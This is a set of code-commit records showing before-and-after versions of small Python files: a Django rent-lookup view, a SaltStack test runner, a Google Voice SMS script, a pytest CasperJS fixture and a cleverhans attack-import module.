from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
<commit_msg>Add zipcode filter for MFPs.<commit_after>from django.shortcuts import render
import logging
from homeful.hud_helper import getSeattleFairMarketRents, getSeattleMultiFamilyProperties
logger = logging.getLogger(__name__)
def index(request):
context = {}
return render(request, 'homeful/index.html', context)
def list(request):
zipcode = request.GET['zipcode']
rooms = request.GET['rooms']
price = request.GET['price']
context = {}
fmrs = getSeattleFairMarketRents()
mfps = getSeattleMultiFamilyProperties()
# modify FMRs and MFPs based on request HERE
seattle_fmr = dict()
for fmr in fmrs:
if fmr['area'] == u'Seattle-Bellevue, WA HUD Metro FMR Area':
seattle_fmr = fmr
mfps = filterByZipcode(zipcode, mfps)
context['mfps'] = mfps
context['rooms'] = rooms
estimated_price = seattle_fmr[rooms + 'br']
price_range_max = estimated_price + (estimated_price*.12)
price_range_min = estimated_price - (estimated_price*.12)
context['price_range'] = "$" + "{0:.2f}".format(price_range_min) + " - $" + "{0:.2f}".format(price_range_max)
return render(request, 'homeful/content1.html', context)
def filterByZipcode(zipcode, mfps):
def myfilter(mfp):
return mfp['zipcode'] == zipcode
return filter(myfilter, mfps)
|
fdd75e81f6d71a8f82abdd79cff6ecd20cbfdb6d | tests/runtests.py | tests/runtests.py | #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
def run_integration_tests():
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
| #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
PNUM = 50
def run_integration_tests():
print '~' * PNUM
print 'Setting up Salt daemons to execute tests'
print '~' * PNUM
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
print '~' * PNUM
print 'Starting Module Tets'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
print '~' * PNUM
print 'Starting Client tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
print '~' * PNUM
print 'Starting Unit Tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
| Add some pretty to the unit tests | Add some pretty to the unit tests
| Python | apache-2.0 | saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt | #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
def run_integration_tests():
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
Add some pretty to the unit tests | #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
PNUM = 50
def run_integration_tests():
print '~' * PNUM
print 'Setting up Salt daemons to execute tests'
print '~' * PNUM
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
print '~' * PNUM
print 'Starting Module Tets'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
print '~' * PNUM
print 'Starting Client tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
print '~' * PNUM
print 'Starting Unit Tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
| <commit_before>#!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
def run_integration_tests():
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
<commit_msg>Add some pretty to the unit tests<commit_after> | #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
PNUM = 50
def run_integration_tests():
print '~' * PNUM
print 'Setting up Salt daemons to execute tests'
print '~' * PNUM
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
print '~' * PNUM
print 'Starting Module Tets'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
print '~' * PNUM
print 'Starting Client tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
print '~' * PNUM
print 'Starting Unit Tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
| #!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
def run_integration_tests():
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
Add some pretty to the unit tests#!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
PNUM = 50
def run_integration_tests():
print '~' * PNUM
print 'Setting up Salt daemons to execute tests'
print '~' * PNUM
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
print '~' * PNUM
print 'Starting Module Tets'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
print '~' * PNUM
print 'Starting Client tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
print '~' * PNUM
print 'Starting Unit Tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
| <commit_before>#!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
def run_integration_tests():
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
<commit_msg>Add some pretty to the unit tests<commit_after>#!/usr/bin/env python
'''
Discover all instances of unittest.TestCase in this directory.
'''
# Import python libs
import os
# Import salt libs
import saltunittest
from integration import TestDaemon
TEST_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
PNUM = 50
def run_integration_tests():
print '~' * PNUM
print 'Setting up Salt daemons to execute tests'
print '~' * PNUM
with TestDaemon():
moduleloader = saltunittest.TestLoader()
moduletests = moduleloader.discover(os.path.join(TEST_DIR, 'integration', 'modules'), '*.py')
print '~' * PNUM
print 'Starting Module Tets'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(moduletests)
clientloader = saltunittest.TestLoader()
clienttests = clientloader.discover(os.path.join(TEST_DIR, 'integration', 'client'), '*.py')
print '~' * PNUM
print 'Starting Client tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(clienttests)
def run_unit_tests():
loader = saltunittest.TestLoader()
tests = loader.discover(os.path.join(TEST_DIR, 'unit', 'templates'), '*.py')
print '~' * PNUM
print 'Starting Unit Tests'
print '~' * PNUM
saltunittest.TextTestRunner(verbosity=1).run(tests)
if __name__ == "__main__":
run_integration_tests()
run_unit_tests()
|
dd877d22080d8417709fe4b5afacec8f0b32a226 | sendsms.py | sendsms.py | #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
def send(number, message):
# (503) 850-8390
USERNAME = 'nicorellius.mail'
PASSWORD = password
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
# try:
voice.send_sms(number, message)
# except Exception as e:
# print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
# print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
| #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
# Google voice accaount for nicorellius.mail: (503) 850-8390
# USERNAME = 'nicorellius.mail@gmail.com'
USERNAME = 'nicorellius.mail'
PASSWORD = password
def send(number, message):
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
try:
voice.send_sms(number, message)
except Exception as e:
print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
| Include exception when trying send_sms function. | Include exception when trying send_sms function.
| Python | mpl-2.0 | nicorellius/server-upbot | #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
def send(number, message):
# (503) 850-8390
USERNAME = 'nicorellius.mail'
PASSWORD = password
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
# try:
voice.send_sms(number, message)
# except Exception as e:
# print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
# print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
Include exception when trying send_sms function. | #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
# Google voice accaount for nicorellius.mail: (503) 850-8390
# USERNAME = 'nicorellius.mail@gmail.com'
USERNAME = 'nicorellius.mail'
PASSWORD = password
def send(number, message):
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
try:
voice.send_sms(number, message)
except Exception as e:
print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
| <commit_before>#! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
def send(number, message):
# (503) 850-8390
USERNAME = 'nicorellius.mail'
PASSWORD = password
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
# try:
voice.send_sms(number, message)
# except Exception as e:
# print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
# print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
<commit_msg>Include exception when trying send_sms function.<commit_after> | #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
# Google voice accaount for nicorellius.mail: (503) 850-8390
# USERNAME = 'nicorellius.mail@gmail.com'
USERNAME = 'nicorellius.mail'
PASSWORD = password
def send(number, message):
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
try:
voice.send_sms(number, message)
except Exception as e:
print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
| #! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
def send(number, message):
# (503) 850-8390
USERNAME = 'nicorellius.mail'
PASSWORD = password
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
# try:
voice.send_sms(number, message)
# except Exception as e:
# print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
# print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
Include exception when trying send_sms function.#! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
# Google voice accaount for nicorellius.mail: (503) 850-8390
# USERNAME = 'nicorellius.mail@gmail.com'
USERNAME = 'nicorellius.mail'
PASSWORD = password
def send(number, message):
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
try:
voice.send_sms(number, message)
except Exception as e:
print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
| <commit_before>#! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
def send(number, message):
# (503) 850-8390
USERNAME = 'nicorellius.mail'
PASSWORD = password
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
# try:
voice.send_sms(number, message)
# except Exception as e:
# print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
# print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
<commit_msg>Include exception when trying send_sms function.<commit_after>#! /usr/bin/env python3
"""sendsms.py: program for sending SMS."""
from sys import argv
from googlevoice import Voice
from googlevoice.util import LoginError
# E-mail SMTP settings
with open('/home/nick/dev/prv/serupbot/email_password.txt') as email_password:
password = email_password.read().strip()
# Google voice accaount for nicorellius.mail: (503) 850-8390
# USERNAME = 'nicorellius.mail@gmail.com'
USERNAME = 'nicorellius.mail'
PASSWORD = password
def send(number, message):
voice = Voice()
try:
voice.login(USERNAME, PASSWORD)
except LoginError as e:
print("Error logging into SMS server: {0}".format(str(e)))
# number = input('Number to send message to: ')
# message = input('Message text: ')
try:
voice.send_sms(number, message)
except Exception as e:
print('Phone number or message error, skipping SMS: {0}'.format(str(e)))
print('Continuing without sending SMS...')
# For testing this program can be run at the terminal with args
if __name__ == '__main__':
if len(argv) != 3:
print('Incorrect number of arguments.')
else:
send(argv[1], argv[2])
|
621c69b22c6364020cf1ed66e4563bd7b43263fc | src/pytest_django_casperjs/fixtures.py | src/pytest_django_casperjs/fixtures.py | import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
@pytest.fixture(autouse=True, scope='function')
def _casper_js_live_server_helper(request):
if 'capser_js' in request.funcargnames:
request.getfuncargvalue('transactional_db')
| import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
| Remove the helper-fixture, we make transactions explicit. Will write documentation about that | Remove the helper-fixture, we make transactions explicit. Will write documentation about that
| Python | bsd-3-clause | EnTeQuAk/pytest-django-casperjs | import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
@pytest.fixture(autouse=True, scope='function')
def _casper_js_live_server_helper(request):
if 'capser_js' in request.funcargnames:
request.getfuncargvalue('transactional_db')
Remove the helper-fixture, we make transactions explicit. Will write documentation about that | import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
| <commit_before>import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
@pytest.fixture(autouse=True, scope='function')
def _casper_js_live_server_helper(request):
if 'capser_js' in request.funcargnames:
request.getfuncargvalue('transactional_db')
<commit_msg>Remove the helper-fixture, we make transactions explicit. Will write documentation about that<commit_after> | import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
| import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
@pytest.fixture(autouse=True, scope='function')
def _casper_js_live_server_helper(request):
if 'capser_js' in request.funcargnames:
request.getfuncargvalue('transactional_db')
Remove the helper-fixture, we make transactions explicit. Will write documentation about thatimport os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
| <commit_before>import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
@pytest.fixture(autouse=True, scope='function')
def _casper_js_live_server_helper(request):
if 'capser_js' in request.funcargnames:
request.getfuncargvalue('transactional_db')
<commit_msg>Remove the helper-fixture, we make transactions explicit. Will write documentation about that<commit_after>import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
|
a3c768ab90d1354441d90699049f7dd946e683c2 | cleverhans/future/torch/attacks/__init__.py | cleverhans/future/torch/attacks/__init__.py | # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
| # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
from cleverhans.future.torch.attacks.spsa import spsa
| Allow spsa to be imported from cleverhans.future.torch.attacks | Allow spsa to be imported from cleverhans.future.torch.attacks
| Python | mit | cleverhans-lab/cleverhans,cleverhans-lab/cleverhans,cleverhans-lab/cleverhans | # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
Allow spsa to be imported from cleverhans.future.torch.attacks | # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
from cleverhans.future.torch.attacks.spsa import spsa
| <commit_before># pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
<commit_msg>Allow spsa to be imported from cleverhans.future.torch.attacks<commit_after> | # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
from cleverhans.future.torch.attacks.spsa import spsa
| # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
Allow spsa to be imported from cleverhans.future.torch.attacks# pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
from cleverhans.future.torch.attacks.spsa import spsa
| <commit_before># pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
